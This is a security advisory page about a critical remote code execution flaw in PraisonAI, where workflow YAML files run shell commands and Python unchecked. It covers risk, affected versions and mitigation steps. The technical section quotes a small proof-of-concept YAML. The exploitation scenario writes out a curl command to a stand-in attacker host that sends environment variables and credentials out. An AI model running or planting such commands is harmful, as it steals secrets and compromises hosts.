AI Threat Alert

GHSA-vc46-vw85-3wvm: PraisonAI: RCE via malicious workflow YAML execution

GHSA-vc46-vw85-3wvm CRITICAL
Published April 10, 2026
CISO Take

PraisonAI's workflow engine blindly executes shell commands and Python code embedded in YAML files passed to `praisonai workflow run`, with zero sandboxing or input validation — a CVSS 9.8 vulnerability requiring no privileges and no interaction beyond the victim running a workflow. This is trivially exploitable: any attacker who can deliver a malicious YAML file through a shared repository, CI/CD pipeline, or social engineering achieves full host compromise. The package carries 41 prior CVEs, signaling a systemic pattern of security debt that compounds risk. Patch to praisonai ≥ 4.5.139 and praisonaiagents ≥ 1.5.140 immediately, audit all YAML workflow files in CI/CD pipelines for untrusted content, and restrict external YAML sources until patched.

Sources: GitHub Advisory ATLAS NVD

What is the risk?

CRITICAL. CVSS 9.8 with AV:N/AC:L/PR:N/UI:N reflects the full blast radius: any environment running PraisonAI workflows against externally-sourced YAML is fully exploitable without restriction. In CI/CD contexts — the primary use case for AI agent orchestration — this becomes a direct supply chain attack vector with near-zero exploitation barrier. The 41 prior CVEs in the same package indicate a systemic security debt warranting elevated scrutiny beyond this single vulnerability. No CISA KEV listing yet, but the trivial exploit primitive and widespread CI usage make active exploitation a near-term certainty.

Attack Kill Chain

Artifact Delivery
Adversary crafts a malicious YAML workflow file with `run:`, `script:`, or `python:` directives and delivers it via shared repository, CI/CD pipeline PR, or social engineering.
AML.T0011.000
User Execution
Victim or automated CI job executes `praisonai workflow run <malicious.yaml>`, triggering the JobWorkflowExecutor to parse and process the untrusted YAML without validation.
AML.T0011
Command Execution
PraisonAI passes `run:` values directly to subprocess.run() or evaluates `script:`/`python:` content via exec(), achieving arbitrary OS and Python code execution on the host.
AML.T0050
Host Compromise
Attacker achieves full system compromise: exfiltrates AI API keys and cloud credentials from environment variables, establishes persistence, and moves laterally to connected AI infrastructure.
AML.T0072

What systems are affected?

Package Ecosystem Vulnerable Range Patched
PraisonAI pip <= 4.5.138 4.5.139
1 dependents 84% patched ~0d to patch Full package profile →
praisonaiagents pip <= 1.5.139 1.5.140
11 dependents 86% patched ~0d to patch Full package profile →

Severity & Risk

CVSS 3.1
9.8 / 10
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
Trivial

Attack Surface

AV AC PR UI S C I A
AV Network
AC Low
PR None
UI None
S Unchanged
C High
I High
A High

What should I do?

6 steps

  1. IMMEDIATE

    Upgrade praisonai to ≥ 4.5.139 and praisonaiagents to ≥ 1.5.140.

  2. AUDIT

    Review all YAML workflow files in CI/CD pipelines and repositories for malicious run:, script:, or python: entries.

  3. RESTRICT

    Allowlist YAML sources — execute workflows only from trusted, version-controlled repositories with signed commits.

  4. SANDBOX

    Run praisonai workflow commands in isolated containers with minimal privileges and no access to sensitive credentials or production networks.

  5. DETECT

    Alert on unexpected subprocess spawns or Python exec() calls originating from praisonai processes.

  6. ROTATE

    If praisonai has been running in CI, rotate all credentials accessible from that environment as a precaution.

Classification

Code Execution Supply Chain Agent Framework AML.T0010.005 AML.T0011 AML.T0011.000 AML.T0050 AML.T0053 AML.T0072

Compliance Impact

This CVE is relevant to:

EU AI Act
Art. 9 - Risk Management System
ISO 42001
A.6.1.4 - AI system supply chain security
NIST AI RMF
GOVERN 1.7 - Processes and policies for AI risk management
OWASP LLM Top 10
LLM07 - Insecure Plugin Design

Frequently Asked Questions

What is GHSA-vc46-vw85-3wvm?

PraisonAI's workflow engine blindly executes shell commands and Python code embedded in YAML files passed to `praisonai workflow run`, with zero sandboxing or input validation — a CVSS 9.8 vulnerability requiring no privileges and no interaction beyond the victim running a workflow. This is trivially exploitable: any attacker who can deliver a malicious YAML file through a shared repository, CI/CD pipeline, or social engineering achieves full host compromise. The package carries 41 prior CVEs, signaling a systemic pattern of security debt that compounds risk. Patch to praisonai ≥ 4.5.139 and praisonaiagents ≥ 1.5.140 immediately, audit all YAML workflow files in CI/CD pipelines for untrusted content, and restrict external YAML sources until patched.

Is GHSA-vc46-vw85-3wvm actively exploited?

No confirmed active exploitation of GHSA-vc46-vw85-3wvm has been reported, but organizations should still patch proactively.

How to fix GHSA-vc46-vw85-3wvm?

1. IMMEDIATE: Upgrade praisonai to ≥ 4.5.139 and praisonaiagents to ≥ 1.5.140. 2. AUDIT: Review all YAML workflow files in CI/CD pipelines and repositories for malicious `run:`, `script:`, or `python:` entries. 3. RESTRICT: Allowlist YAML sources — execute workflows only from trusted, version-controlled repositories with signed commits. 4. SANDBOX: Run praisonai workflow commands in isolated containers with minimal privileges and no access to sensitive credentials or production networks. 5. DETECT: Alert on unexpected subprocess spawns or Python exec() calls originating from praisonai processes. 6. ROTATE: If praisonai has been running in CI, rotate all credentials accessible from that environment as a precaution.

What systems are affected by GHSA-vc46-vw85-3wvm?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, CI/CD pipelines, multi-agent orchestration, training pipelines.

What is the CVSS score for GHSA-vc46-vw85-3wvm?

GHSA-vc46-vw85-3wvm has a CVSS v3.1 base score of 9.8 (CRITICAL).

AI Security Impact

Affected AI Architectures

agent frameworksCI/CD pipelinesmulti-agent orchestrationtraining pipelines

MITRE ATLAS Techniques

AML.T0010.005 AI Agent Tool
AML.T0011 User Execution
AML.T0011.000 Unsafe AI Artifacts
AML.T0050 Command and Scripting Interpreter
AML.T0053 AI Agent Tool Invocation
AML.T0072 Reverse Shell

Compliance Controls Affected

EU AI Act: Art. 9
ISO 42001: A.6.1.4
NIST AI RMF: GOVERN 1.7
OWASP LLM Top 10: LLM07

Technical Details

Original Advisory

`praisonai workflow run <file.yaml>` loads untrusted YAML and if `type: job` executes steps through `JobWorkflowExecutor` in job_workflow.py. This supports: - `run:` → shell command execution via `subprocess.run()` - `script:` → inline Python execution via `exec()` - `python:` → arbitrary Python script execution A malicious YAML file can execute arbitrary host commands. ### Affected Code - workflow.py → `action_run()` - job_workflow.py → `_exec_shell()`, `_exec_inline_python()`, `_exec_python_script()` ### PoC Create `exploit.yaml`: ```yaml type: job name: exploit steps: - name: write-file run: python -c "open('pwned.txt','w').write('owned')" ``` Run: ```bash praisonai workflow run exploit.yaml ``` ### Reproduction Steps 1. Save the YAML above as `exploit.yaml`. 2. Execute `praisonai workflow run exploit.yaml`. 3. Confirm `pwned.txt` appears in the working directory. ### Impact Remote or local attacker-supplied workflow YAML can execute arbitrary host commands and code, enabling full system compromise in CI or shared deployment contexts. **Reporter:** Lakshmikanthan K (letchupkt)

Exploitation Scenario

An adversary targeting an organization's AI development pipeline uploads a malicious `automation.yaml` to a shared workflow repository or submits it via a GitHub PR to a CI/CD job. The file contains a `type: job` step with `run: curl attacker.com/exfil -d "$(env | base64)"`, which silently exfiltrates all environment variables — including OpenAI API keys, AWS credentials, and database connection strings — the moment any developer or automated job runs `praisonai workflow run automation.yaml`. With zero prerequisites, no authentication, and no special knowledge required, the attacker achieves full host compromise. In multi-agent deployments where PraisonAI orchestrates downstream AI tools, the blast radius extends to all connected systems and their credentials.

Weaknesses (CWE)

CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') Primary CWE-94 Improper Control of Generation of Code ('Code Injection') Primary

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

References

Timeline

Published
April 10, 2026
Last Modified
April 10, 2026
First Seen
April 10, 2026

Related Vulnerabilities

CRITICAL CVE-2026-39890 9.8

PraisonAI: YAML deserialization enables unauthenticated RCE

Same package: praisonai
CRITICAL GHSA-9qhq-v63v-fv3j 9.8

PraisonAI: RCE via MCP command injection

Same package: praisonai
CRITICAL GHSA-2763-cj5r-c79m 9.7

PraisonAI: RCE via shell injection in agent workflows

Same package: praisonai
CRITICAL CVE-2026-44336 9.6

PraisonAI: MCP path traversal escalates to full RCE

Same package: praisonai
CRITICAL CVE-2026-40154 9.3

PraisonAI: supply chain RCE via unverified template exec

Same package: praisonai
Back to Threat Feed